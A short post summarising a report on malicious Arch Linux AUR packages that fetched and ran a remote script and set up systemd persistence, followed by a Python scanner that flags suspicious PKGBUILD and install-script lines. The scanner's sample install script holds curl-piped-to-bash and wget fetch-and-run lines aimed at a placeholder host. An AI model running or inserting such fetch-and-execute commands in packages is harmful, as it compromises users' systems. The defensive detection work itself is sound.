Malware found in the Arch Linux AUR repository
Here's a report in Sensors Tech Forum on the discovery of a set of hostile packages in the Arch Linux AUR repository system. AUR contains user-contributed packages, of course; it's not a part of the Arch distribution itself. "The security investigation shows that a malicious user with the nick name xeactor modified in June 7 an orphaned package (software without an active maintainer) called acroread. The changes included a curl script that downloads and runs a script from a remote site. This installs a persistent software that reconfigures systemd in order to start periodically. While it appears that they are not a serious threat to the security of the infected hosts, the scripts can be manipulated at any time to include arbitrary code. Two other packages were modified in the same manner." This thread in the aur-general list shows the timeline of the discovery and response.
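The two behaviours the report describes (a downloaded script that is run directly, and systemd being set up for periodic execution) are things a reviewer can look for in a PKGBUILD or `.install` file before building. The sketch below is an added example, not code from the report or from any AUR tool; the rule names, sample file contents and `example.invalid` URLs are constructed for illustration, and the patterns are review heuristics, not a complete detector.

```python
import re

# Heuristic rules (names are hypothetical): flag lines for manual review.
RULES = [
    # curl/wget output piped straight into a shell
    ("download-piped-to-shell",
     re.compile(r"\b(curl|wget)\b[^\n|;]*\|\s*(sudo\s+)?(ba|z|da)?sh\b")),
    # shell fed from a command or process substitution that downloads
    ("download-in-command-substitution",
     re.compile(r"\b(ba|z|da)?sh\b[^\n]*(\$\(|<\(|`)\s*(curl|wget)\b")),
    # install script enabling/starting units or dropping unit files
    ("systemd-unit-written-or-enabled",
     re.compile(r"systemctl\s+(--\S+\s+)*(enable|start)\b"
                r"|/systemd/system/\S+\.(timer|service)")),
]

def scan_package_script(text):
    """Return (line_number, rule_name, line) for each suspicious line."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # ignore blank lines and full-line comments
        for name, pattern in RULES:
            if pattern.search(stripped):
                findings.append((number, name, stripped))
    return findings

# Constructed sample inputs, not taken from the affected packages.
SAMPLE_PKGBUILD = """\
pkgname=example-viewer
pkgver=1.0
source=("https://example.invalid/example-viewer-1.0.tar.gz")
# curl https://example.invalid/x | bash   (comment, ignored)
package() {
  install -Dm755 viewer "$pkgdir/usr/bin/viewer"
}
"""
SAMPLE_INSTALL = """\
post_install() {
  curl -s https://example.invalid/setup | bash &
  bash <(wget -qO- https://example.invalid/setup2)
  systemctl enable --now example-refresh.timer
}
"""

if __name__ == "__main__":
    for label, body in (("PKGBUILD", SAMPLE_PKGBUILD), ("install", SAMPLE_INSTALL)):
        for number, name, line in scan_package_script(body):
            print(f"{label}:{number}: {name}: {line}")
```

A hit is a prompt to read the file, not a verdict: some packages legitimately ship unit files, and a script can hide a download behind variables or encoding that these patterns will not see.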